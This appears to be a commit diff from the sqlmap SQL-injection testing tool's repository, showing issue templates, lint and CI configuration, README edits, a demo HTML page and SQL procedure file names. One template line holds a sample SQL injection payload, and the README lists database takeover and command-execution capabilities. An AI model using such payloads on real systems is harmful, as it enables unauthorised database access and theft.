Update regarding #4099

Add link of persian (#4099 )
* Add the persian translations * Update README-fa-FA.md * Update README-fa-FA.md * Update README-fa-FA.md * Update README-fa-FA.md * add to persian translations HI please add to persian translations regard: elias rohani * Add link of persian * Revert "Add link of persian" * Revert "Add link of persian"
2025-12-06 12:41:30 +00:00 · 2020-02-01 14:36:27 +01:00 · 2020-02-01 14:28:16 +01:00 · 2020-01-31 22:37:39 +01:00 · 2020-01-31 21:51:02 +01:00 · 2020-01-31 21:24:20 +01:00
582 changed files with 18298 additions and 14797 deletions
--- a/.gitattributes
+++ b/.gitattributes
@@ -3,6 +3,8 @@
 *.md5 text eol=lf
 *.py text eol=lf
 *.xml text eol=lf
 LICENSE text eol=lf
 COMMITMENT text eol=lf
 *_ binary
 *.dll binary
--- a/.github/ISSUE_TEMPLATE.md
+++ b/.github/ISSUE_TEMPLATE.md
@@ -1,26 +0,0 @@
 ## What's the problem (or question)?
 <!--- If describing a bug, tell us what happens instead of the expected behavior -->
 <!--- If suggesting a change/improvement, explain the difference from current behavior -->
 ## Do you have an idea for a solution?
 <!--- Not obligatory, but suggest a fix/reason for the bug, -->
 <!--- or ideas how to implement the addition or change -->
 ## How can we reproduce the issue?
 <!--- Provide unambiguous set of steps to reproduce this bug. Include command to reproduce, if relevant (you can mask the sensitive data) -->
 1.
 2.
 3.
 4.
 ## What are the running context details?
 <!--- Include as many relevant details about the running context you experienced the bug/problem in -->
 * Installation method (e.g. `pip`, `apt-get`, `git clone` or `zip`/`tar.gz`):
 * Client OS (e.g. `Microsoft Windows 10`)
 * Program version (`python sqlmap.py --version` or `sqlmap --version` depending on installation): 
 * Target DBMS (e.g. `Microsoft SQL Server`): 
 * Detected WAF/IPS protection (e.g. `ModSecurity` or `unknown`):
 * SQLi techniques found by sqlmap (e.g. `error-based` and `boolean-based blind`):
 * Results of manual target assessment (e.g. found that the payload `query=test' AND 4113 IN ((SELECT 'foobar'))-- qKLV` works):
 * Relevant console output (if any):
 * Exception traceback (if any):
--- a/.github/ISSUE_TEMPLATE/bug_report.md
+++ b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -0,0 +1,37 @@
 ---
 name: Bug report
 about: Create a report to help us improve
 title: ''
 labels: bug report
 assignees: ''
 ---
 **Describe the bug**
 A clear and concise description of what the bug is.
 **To Reproduce**
 1. Run '...'
 2. See error
 **Expected behavior**
 A clear and concise description of what you expected to happen.
 **Screenshots**
 If applicable, add screenshots to help explain your problem.
 **Running environment:**
 - sqlmap version [e.g. 1.3.5.93#dev]
 - Installation method [e.g. git]
 - Operating system: [e.g. Microsoft Windows 10]
 - Python version [e.g. 3.5.2]
 **Target details:**
 - DBMS [e.g. Microsoft SQL Server]
 - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind]
 - WAF/IPS [if any]
 - Relevant console output [if any]
 - Exception traceback [if any]
 **Additional context**
 Add any other context about the problem here.
--- a/.github/ISSUE_TEMPLATE/feature_request.md
+++ b/.github/ISSUE_TEMPLATE/feature_request.md
@@ -0,0 +1,20 @@
 ---
 name: Feature request
 about: Suggest an idea for this project
 title: ''
 labels: feature request
 assignees: ''
 ---
 **Is your feature request related to a problem? Please describe.**
 A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
 **Describe the solution you'd like**
 A clear and concise description of what you want to happen.
 **Describe alternatives you've considered**
 A clear and concise description of any alternative solutions or features you've considered.
 **Additional context**
 Add any other context or screenshots about the feature request here.
--- a/.gitignore
+++ b/.gitignore
@@ -1,6 +1,8 @@
 *.py[cod]
 output/
 __pycache__/
 *.py[cod]
 .sqlmap_history
 traffic.txt
 *~
 req*.txt
 .idea/
--- a/.pylintrc
+++ b/.pylintrc
@@ -0,0 +1,546 @@
 # Based on Apache 2.0 licensed code from https://github.com/ClusterHQ/flocker
 [MASTER]
 # Specify a configuration file.
 #rcfile=
 # Python code to execute, usually for sys.path manipulation such as
 # pygtk.require().
 init-hook="from pylint.config import find_pylintrc; import os, sys; sys.path.append(os.path.dirname(find_pylintrc()))"
 # Add files or directories to the blacklist. They should be base names, not
 # paths.
 ignore=
 # Pickle collected data for later comparisons.
 persistent=no
 # List of plugins (as comma separated values of python modules names) to load,
 # usually to register additional checkers.
 load-plugins=
 # Use multiple processes to speed up Pylint.
 # DO NOT CHANGE THIS VALUES >1 HIDE RESULTS!!!!!
 jobs=1
 # Allow loading of arbitrary C extensions. Extensions are imported into the
 # active Python interpreter and may run arbitrary code.
 unsafe-load-any-extension=no
 # A comma-separated list of package or module names from where C extensions may
 # be loaded. Extensions are loading into the active Python interpreter and may
 # run arbitrary code
 extension-pkg-whitelist=
 # Allow optimization of some AST trees. This will activate a peephole AST
 # optimizer, which will apply various small optimizations. For instance, it can
 # be used to obtain the result of joining multiple strings with the addition
 # operator. Joining a lot of strings can lead to a maximum recursion error in
 # Pylint and this flag can prevent that. It has one side effect, the resulting
 # AST will be different than the one from reality.
 optimize-ast=no
 [MESSAGES CONTROL]
 # Only show warnings with the listed confidence levels. Leave empty to show
 # all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED
 confidence=
 # Enable the message, report, category or checker with the given id(s). You can
 # either give multiple identifier separated by comma (,) or put this option
 # multiple time. See also the "--disable" option for examples.
 disable=all
 enable=import-error,
       import-self,
       reimported,
       wildcard-import,
       misplaced-future,
       deprecated-module,
       unpacking-non-sequence,
       invalid-all-object,
       undefined-all-variable,
       used-before-assignment,
       cell-var-from-loop,
       global-variable-undefined,
       redefine-in-handler,
       unused-import,
       unused-wildcard-import,
       global-variable-not-assigned,
       undefined-loop-variable,
       global-at-module-level,
       bad-open-mode,
       redundant-unittest-assert,
       boolean-datetime
       deprecated-method,
       anomalous-unicode-escape-in-string,
       anomalous-backslash-in-string,
       not-in-loop,
       continue-in-finally,
       abstract-class-instantiated,
       star-needs-assignment-target,
       duplicate-argument-name,
       return-in-init,
       too-many-star-expressions,
       nonlocal-and-global,
       return-outside-function,
       return-arg-in-generator,
       invalid-star-assignment-target,
       bad-reversed-sequence,
       nonexistent-operator,
       yield-outside-function,
       init-is-generator,
       nonlocal-without-binding,
       lost-exception,
       assert-on-tuple,
       dangerous-default-value,
       duplicate-key,
       useless-else-on-loop
       expression-not-assigned,
       confusing-with-statement,
       unnecessary-lambda,
       pointless-statement,
       pointless-string-statement,
       unnecessary-pass,
       unreachable,
       using-constant-test,
       bad-super-call,
       missing-super-argument,
       slots-on-old-class,
       super-on-old-class,
       property-on-old-class,
       not-an-iterable,
       not-a-mapping,
       format-needs-mapping,
       truncated-format-string,
       missing-format-string-key,
       mixed-format-string,
       too-few-format-args,
       bad-str-strip-call,
       too-many-format-args,
       bad-format-character,
       format-combined-specification,
       bad-format-string-key,
       bad-format-string,
       missing-format-attribute,
       missing-format-argument-key,
       unused-format-string-argument
       unused-format-string-key,
       invalid-format-index,
       bad-indentation,
       mixed-indentation,
       unnecessary-semicolon,
       lowercase-l-suffix,
       invalid-encoded-data,
       unpacking-in-except,
       import-star-module-level,
       long-suffix,
       old-octal-literal,
       old-ne-operator,
       backtick,
       old-raise-syntax,
       metaclass-assignment,
       next-method-called,
       dict-iter-method,
       dict-view-method,
       indexing-exception,
       raising-string,
       using-cmp-argument,
       cmp-method,
       coerce-method,
       delslice-method,
       getslice-method,
       hex-method,
       nonzero-method,
       t-method,
       setslice-method,
       old-division,
       logging-format-truncated,
       logging-too-few-args,
       logging-too-many-args,
       logging-unsupported-format,
       logging-format-interpolation,
       invalid-unary-operand-type,
       unsupported-binary-operation,
       not-callable,
       redundant-keyword-arg,
       assignment-from-no-return,
       assignment-from-none,
       not-context-manager,
       repeated-keyword,
       missing-kwoa,
       no-value-for-parameter,
       invalid-sequence-index,
       invalid-slice-index,
       unexpected-keyword-arg,
       unsupported-membership-test,
       unsubscriptable-object,
       access-member-before-definition,
       method-hidden,
       assigning-non-slot,
       duplicate-bases,
       inconsistent-mro,
       inherit-non-class,
       invalid-slots,
       invalid-slots-object,
       no-method-argument,
       no-self-argument,
       unexpected-special-method-signature,
       non-iterator-returned,
       arguments-differ,
       signature-differs,
       bad-staticmethod-argument,
       non-parent-init-called,
       bad-except-order,
       catching-non-exception,
       bad-exception-context,
       notimplemented-raised,
       raising-bad-type,
       raising-non-exception,
       misplaced-bare-raise,
       duplicate-except,
       nonstandard-exception,
       binary-op-exception,
       not-async-context-manager,
       yield-inside-async-function
 # Needs investigation:
 # abstract-method (might be indicating a bug? probably not though)
 # protected-access (requires some refactoring)
 # attribute-defined-outside-init (requires some refactoring)
 # super-init-not-called (requires some cleanup)
 # Things we'd like to enable someday:
 # redefined-builtin (requires a bunch of work to clean up our code first)
 # redefined-outer-name (requires a bunch of work to clean up our code first)
 # undefined-variable (re-enable when pylint fixes https://github.com/PyCQA/pylint/issues/760)
 # no-name-in-module (giving us spurious warnings https://github.com/PyCQA/pylint/issues/73)
 # unused-argument (need to clean up or code a lot, e.g. prefix unused_?)
 # function-redefined (@overload causes lots of spurious warnings)
 # too-many-function-args (@overload causes spurious warnings... I think)
 # parameter-unpacking (needed for eventual Python 3 compat)
 # print-statement (needed for eventual Python 3 compat)
 # filter-builtin-not-iterating (Python 3)
 # map-builtin-not-iterating (Python 3)
 # range-builtin-not-iterating (Python 3)
 # zip-builtin-not-iterating (Python 3)
 # many others relevant to Python 3
 # unused-variable (a little work to cleanup, is all)
 # ...
 [REPORTS]
 # Set the output format. Available formats are text, parseable, colorized, msvs
 # (visual studio) and html. You can also give a reporter class, eg
 # mypackage.mymodule.MyReporterClass.
 output-format=parseable
 # Put messages in a separate file for each module / package specified on the
 # command line instead of printing them on stdout. Reports (if any) will be
 # written in a file name "pylint_global.[txt|html]".
 files-output=no
 # Tells whether to display a full report or only the messages
 reports=no
 # Python expression which should return a note less than 10 (10 is the highest
 # note). You have access to the variables errors warning, statement which
 # respectively contain the number of errors / warnings messages and the total
 # number of statements analyzed. This is used by the global evaluation report
 # (RP0004).
 evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10)
 # Template used to display messages. This is a python new-style format string
 # used to format the message information. See doc for all details
 #msg-template=
 [LOGGING]
 # Logging modules to check that the string format arguments are in logging
 # function parameter format
 logging-modules=logging
 [FORMAT]
 # Maximum number of characters on a single line.
 max-line-length=100
 # Regexp for a line that is allowed to be longer than the limit.
 ignore-long-lines=^\s*(# )?<?https?://\S+>?$
 # Allow the body of an if to be on the same line as the test if there is no
 # else.
 single-line-if-stmt=no
 # List of optional constructs for which whitespace checking is disabled. `dict-
 # separator` is used to allow tabulation in dicts, etc.: {1  : 1,\n222: 2}.
 # `trailing-comma` allows a space between comma and closing bracket: (a, ).
 # `empty-line` allows space-only lines.
 no-space-check=trailing-comma,dict-separator
 # Maximum number of lines in a module
 max-module-lines=1000
 # String used as indentation unit. This is usually "    " (4 spaces) or "\t" (1
 # tab).
 indent-string='    '
 # Number of spaces of indent required inside a hanging  or continued line.
 indent-after-paren=4
 # Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
 expected-line-ending-format=
 [TYPECHECK]
 # Tells whether missing members accessed in mixin class should be ignored. A
 # mixin class is detected if its name ends with "mixin" (case insensitive).
 ignore-mixin-members=yes
 # List of module names for which member attributes should not be checked
 # (useful for modules/projects where namespaces are manipulated during runtime
 # and thus existing member attributes cannot be deduced by static analysis. It
 # supports qualified module names, as well as Unix pattern matching.
 ignored-modules=thirdparty.six.moves
 # List of classes names for which member attributes should not be checked
 # (useful for classes with attributes dynamically set). This supports can work
 # with qualified names.
 ignored-classes=
 # List of members which are set dynamically and missed by pylint inference
 # system, and so shouldn't trigger E1101 when accessed. Python regular
 # expressions are accepted.
 generated-members=
 [VARIABLES]
 # Tells whether we should check for unused import in __init__ files.
 init-import=no
 # A regular expression matching the name of dummy variables (i.e. expectedly
 # not used).
 dummy-variables-rgx=_$|dummy
 # List of additional names supposed to be defined in builtins. Remember that
 # you should avoid to define new builtins when possible.
 additional-builtins=
 # List of strings which can identify a callback function by name. A callback
 # name must start or end with one of those strings.
 callbacks=cb_,_cb
 [SIMILARITIES]
 # Minimum lines number of a similarity.
 min-similarity-lines=4
 # Ignore comments when computing similarities.
 ignore-comments=yes
 # Ignore docstrings when computing similarities.
 ignore-docstrings=yes
 # Ignore imports when computing similarities.
 ignore-imports=no
 [SPELLING]
 # Spelling dictionary name. Available dictionaries: none. To make it working
 # install python-enchant package.
 spelling-dict=
 # List of comma separated words that should not be checked.
 spelling-ignore-words=
 # A path to a file that contains private dictionary; one word per line.
 spelling-private-dict-file=
 # Tells whether to store unknown words to indicated private dictionary in
 # --spelling-private-dict-file option instead of raising a message.
 spelling-store-unknown-words=no
 [MISCELLANEOUS]
 # List of note tags to take in consideration, separated by a comma.
 notes=FIXME,XXX,TODO
 [BASIC]
 # List of builtins function names that should not be used, separated by a comma
 bad-functions=map,filter,input
 # Good variable names which should always be accepted, separated by a comma
 good-names=i,j,k,ex,Run,_
 # Bad variable names which should always be refused, separated by a comma
 bad-names=foo,bar,baz,toto,tutu,tata
 # Colon-delimited sets of names that determine each other's naming style when
 # the name regexes allow several styles.
 name-group=
 # Include a hint for the correct naming format with invalid-name
 include-naming-hint=no
 # Regular expression matching correct function names
 function-rgx=[a-z_][a-z0-9_]{2,30}$
 # Naming hint for function names
 function-name-hint=[a-z_][a-z0-9_]{2,30}$
 # Regular expression matching correct variable names
 variable-rgx=[a-z_][a-z0-9_]{2,30}$
 # Naming hint for variable names
 variable-name-hint=[a-z_][a-z0-9_]{2,30}$
 # Regular expression matching correct constant names
 const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$
 # Naming hint for constant names
 const-name-hint=(([A-Z_][A-Z0-9_]*)|(__.*__))$
 # Regular expression matching correct attribute names
 attr-rgx=[a-z_][a-z0-9_]{2,30}$
 # Naming hint for attribute names
 attr-name-hint=[a-z_][a-z0-9_]{2,30}$
 # Regular expression matching correct argument names
 argument-rgx=[a-z_][a-z0-9_]{2,30}$
 # Naming hint for argument names
 argument-name-hint=[a-z_][a-z0-9_]{2,30}$
 # Regular expression matching correct class attribute names
 class-attribute-rgx=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$
 # Naming hint for class attribute names
 class-attribute-name-hint=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$
 # Regular expression matching correct inline iteration names
 inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$
 # Naming hint for inline iteration names
 inlinevar-name-hint=[A-Za-z_][A-Za-z0-9_]*$
 # Regular expression matching correct class names
 class-rgx=[A-Z_][a-zA-Z0-9]+$
 # Naming hint for class names
 class-name-hint=[A-Z_][a-zA-Z0-9]+$
 # Regular expression matching correct module names
 module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$
 # Naming hint for module names
 module-name-hint=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$
 # Regular expression matching correct method names
 method-rgx=[a-z_][a-z0-9_]{2,30}$
 # Naming hint for method names
 method-name-hint=[a-z_][a-z0-9_]{2,30}$
 # Regular expression which should only match function or class names that do
 # not require a docstring.
 no-docstring-rgx=^_
 # Minimum line length for functions/classes that require docstrings, shorter
 # ones are exempt.
 docstring-min-length=-1
 [ELIF]
 # Maximum number of nested blocks for function / method body
 max-nested-blocks=5
 [IMPORTS]
 # Deprecated modules which should not be used, separated by a comma
 deprecated-modules=regsub,TERMIOS,Bastion,rexec
 # Create a graph of every (i.e. internal and external) dependencies in the
 # given file (report RP0402 must not be disabled)
 import-graph=
 # Create a graph of external dependencies in the given file (report RP0402 must
 # not be disabled)
 ext-import-graph=
 # Create a graph of internal dependencies in the given file (report RP0402 must
 # not be disabled)
 int-import-graph=
 [DESIGN]
 # Maximum number of arguments for function / method
 max-args=5
 # Argument names that match this expression will be ignored. Default to name
 # with leading underscore
 ignored-argument-names=_.*
 # Maximum number of locals for function / method body
 max-locals=15
 # Maximum number of return / yield for function / method body
 max-returns=6
 # Maximum number of branch for function / method body
 max-branches=12
 # Maximum number of statements in function / method body
 max-statements=50
 # Maximum number of parents for a class (see R0901).
 max-parents=7
 # Maximum number of attributes for a class (see R0902).
 max-attributes=7
 # Minimum number of public methods for a class (see R0903).
 min-public-methods=2
 # Maximum number of public methods for a class (see R0904).
 max-public-methods=20
 # Maximum number of boolean expressions in a if statement
 max-bool-expr=5
 [CLASSES]
 # List of method names used to declare (i.e. assign) instance attributes.
 defining-attr-methods=__init__,__new__,setUp
 # List of valid names for the first argument in a class method.
 valid-classmethod-first-arg=cls
 # List of valid names for the first argument in a metaclass class method.
 valid-metaclass-classmethod-first-arg=mcs
 # List of member names, which should be excluded from the protected access
 # warning.
 exclude-protected=_asdict,_fields,_replace,_source,_make
 [EXCEPTIONS]
 # Exceptions that will emit a warning when being caught. Defaults to
 # "Exception"
 overgeneral-exceptions=Exception
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,9 +1,20 @@
 language: python
 jobs:
    include:
        - python: 2.6
          dist: trusty
        - python: 2.7
          dist: trusty
        - python: 3.3
          dist: trusty
        - python: 3.6
          dist: trusty
        - python: 3.8
          dist: xenial
 sudo: false
 git:
    depth: 1
 python:
    - "2.6"
    - "2.7"
 script:
    - python -c "import sqlmap; import sqlmapapi"
    - python sqlmap.py --smoke
    - python sqlmap.py --vuln
--- a/2
+++ b/2
@@ -1,7 +1,7 @@
 COPYING -- Describes the terms under which sqlmap is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
-sqlmap is (C) 2006-2019 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2020 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/README.md
+++ b/README.md
@@ -1,17 +1,17 @@
-# sqlmap
+# sqlmap ![](https://i.imgur.com/fe85aVR.png)
-[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
-sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
+sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
-**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/scan-website-security-issues/?utm_source=sqlmap.org&utm_medium=banner&utm_campaign=github).**
+**The sqlmap project is currently searching for sponsor(s).**
 Screenshots
 ----
 ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
-You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of features on the wiki.
+You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki.
 Installation
 ----
@@ -22,7 +22,7 @@ Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlm
    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
+sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform.
 Usage
 ----
@@ -36,7 +36,7 @@ To get a list of all options and switches use:
    python sqlmap.py -hh
 You can find a sample run [here](https://asciinema.org/a/46601).
-To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
 Links
 ----
@@ -58,10 +58,13 @@ Translations
 * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
 * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
 * [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
 * [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-GER.md)
 * [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
 * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
 * [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
 * [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
 * [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md)
 * [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-FA.md)
 * [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
 * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
 * [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
--- a/data/html/index.html
+++ b/data/html/index.html
@@ -0,0 +1,150 @@
 <!DOCTYPE html>
 <!-- http://angrytools.com/bootstrap/editor/ -->
 <html lang="en">
 <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap-theme.min.css" rel="stylesheet">
    <!--[if lt IE 9]><script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script><script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script><![endif]-->
 </head>
 <body>
    <style>
  #wrapper { width: 100%; }
  #page-wrapper {
    padding: 0 15px;
    min-height: 568px;
    background-color: #fff;
  }
  @media(min-width:768px) {
    #page-wrapper {
      position: inherit;
      margin: 0 0 0 250px;
      padding: 0 30px;
      border-left: 1px solid #e7e7e7;
    }
  } 
  .sidebar .sidebar-nav.navbar-collapse { padding-right: 0; padding-left: 0; }
  .sidebar .sidebar-search { padding: 15px; }
  .sidebar ul li { border-bottom: 1px solid #e7e7e7; }
  .sidebar ul li a.active { background-color: #eee; }
  .sidebar .arrow { float: right;}
  .sidebar .fa.arrow:before { content: "f104";}
  .sidebar .active>a>.fa.arrow:before { content: "f107"; }
  .sidebar .nav-second-level li,
  .sidebar .nav-third-level li {
    border-bottom: 0!important;
  }
  .sidebar .nav-second-level li a { padding-left: 37px; }
  .sidebar .nav-third-level li a { padding-left: 52px; }
  @media(min-width:768px) {
    .sidebar {
      z-index: 1;
      position: absolute;
      width: 250px;
      margin-top: 51px;
    }   
  } 
 </style>
 <div id="wrapper">
  <nav class="navbar navbar-default navbar-static-top" role="navigation" style="margin-bottom: 0">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="index.html">sqlmap</a>
    </div>
    <div class="navbar-default sidebar" role="navigation">
      <div class="sidebar-nav navbar-collapse">
        <ul class="nav" id="side-menu">                        
          <li>
            <a href="#"><i class="glyphicon glyphicon-home"></i> Options<span class="arrow"></span></a>
            <ul class="nav nav-second-level">
              <li><a>Target</a></li>
              <li><a>Request</a></li>
              <li><a>Optimization</a></li>
              <li><a>Injection</a></li>
              <li><a>Detection</a></li>
              <li><a>Techniques</a></li>
              <li><a>Fingerprint</a></li>
              <li><a>Enumeration</a></li>
              <li><a>Brute force</a></li>
              <li><a>User-defined function injection</a></li>
              <li><a>File system access</a></li>
              <li><a>Operating system access</a></li>
              <li><a>Windows registry access</a></li>
              <li><a>General</a></li>
              <li><a>Miscellaneous</a></li>
            </ul> 
          </li> 
        </ul>
      </div>
    </div>             
  </nav>
  <div id="page-wrapper"> 
    <div class="row">
      <h4>DEMO</h4>
    </div> 
  </div>
 </div>
 <script>
  /*
 * metismenu - v1.0.3
 * Easy menu jQuery plugin for Twitter Bootstrap 3
 * https://github.com/onokumus/metisMenu
 *
 * Made by Osman Nuri Okumuş
 * Under MIT License
 */
  !function(a,b,c){function d(b,c){this.element=b,this.settings=a.extend({},f,c),this._defaults=f,this._name=e,this.init()}var e="metisMenu",f={toggle:!0};d.prototype={init:function(){var b=a(this.element),c=this.settings.toggle;this.isIE()<=9?(b.find("li.active").has("ul").children("ul").collapse("show"),b.find("li").not(".active").has("ul").children("ul").collapse("hide")):(b.find("li.active").has("ul").children("ul").addClass("collapse in"),b.find("li").not(".active").has("ul").children("ul").addClass("collapse")),b.find("li").has("ul").children("a").on("click",function(b){b.preventDefault(),a(this).parent("li").toggleClass("active").children("ul").collapse("toggle"),c&&a(this).parent("li").siblings().removeClass("active").children("ul.in").collapse("hide")})},isIE:function(){for(var a,b=3,d=c.createElement("div"),e=d.getElementsByTagName("i");d.innerHTML="<!--[if gt IE "+ ++b+"]><i></i><![endif]-->",e[0];)return b>4?b:a}},a.fn[e]=function(b){return this.each(function(){a.data(this,"plugin_"+e)||a.data(this,"plugin_"+e,new d(this,b))})}}(jQuery,window,document);
  $(function() {
    $('#side-menu').metisMenu();
  });
  //Loads the correct sidebar on window load,
  //collapses the sidebar on window resize.
  // Sets the min-height of #page-wrapper to window size
  $(function() {
    $(window).bind("load resize", function() {
      topOffset = 50;
      width = (this.window.innerWidth > 0) ? this.window.innerWidth : this.screen.width;
      if (width < 768) {
        $('div.navbar-collapse').addClass('collapse')
        topOffset = 100; // 2-row-menu
      } else {
        $('div.navbar-collapse').removeClass('collapse')
      }
      height = (this.window.innerHeight > 0) ? this.window.innerHeight : this.screen.height;
      height = height - topOffset;
      if (height < 1) height = 1;
      if (height > topOffset) {
        $("#page-wrapper").css("min-height", (height) + "px");
      }
    })
  });
 </script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
 </body>
 </html>
--- a/data/procs/README.txt
+++ b/data/procs/README.txt
--- a/data/procs/mssqlserver/activate_sp_oacreate.sql
+++ b/data/procs/mssqlserver/activate_sp_oacreate.sql
--- a/data/procs/mssqlserver/configure_openrowset.sql
+++ b/data/procs/mssqlserver/configure_openrowset.sql
--- a/data/procs/mssqlserver/configure_xp_cmdshell.sql
+++ b/data/procs/mssqlserver/configure_xp_cmdshell.sql
--- a/data/procs/mssqlserver/create_new_xp_cmdshell.sql
+++ b/data/procs/mssqlserver/create_new_xp_cmdshell.sql
--- a/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql
+++ b/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql
--- a/data/procs/mssqlserver/dns_request.sql
+++ b/data/procs/mssqlserver/dns_request.sql
--- a/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql
+++ b/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql
--- a/data/procs/mssqlserver/run_statement_as_user.sql
+++ b/data/procs/mssqlserver/run_statement_as_user.sql
--- a/data/procs/mysql/dns_request.sql
+++ b/data/procs/mysql/dns_request.sql
--- a/data/procs/mysql/write_file_limit.sql
+++ b/data/procs/mysql/write_file_limit.sql
--- a/data/procs/oracle/dns_request.sql
+++ b/data/procs/oracle/dns_request.sql
--- a/data/procs/oracle/read_file_export_extension.sql
+++ b/data/procs/oracle/read_file_export_extension.sql
@@ -0,0 +1,4 @@
